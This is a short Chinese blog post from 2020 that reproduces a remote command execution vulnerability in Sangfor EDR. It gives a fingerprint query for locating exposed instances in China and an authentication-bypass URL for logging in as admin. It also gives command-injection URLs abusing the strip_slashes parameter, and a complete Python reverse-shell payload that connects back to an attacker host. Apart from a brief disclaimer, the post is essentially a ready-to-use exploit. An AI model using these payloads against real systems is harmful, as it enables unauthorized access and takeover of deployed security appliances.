美文网首页
深信服EDR远程命令执行漏洞复现

深信服EDR远程命令执行漏洞复现

作者: migrate_ | 来源:发表于2020-08-31 10:01 被阅读0次

0x01仅供交流与学习使用,请勿用于非法用途

  • 目标
title="终端检测响应平台" && country="CN"
  • payload
#越权登录
https://ip:xx/ui/login.php?user=admin   #(用户名必须存在)
#命令执行
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
#反弹shell
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.105',1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
1.jpg 2.jpg 3.jpg

相关文章

网友评论

      本文标题:深信服EDR远程命令执行漏洞复现

      本文链接:https://www.haomeiwen.com/subject/swfusktx.html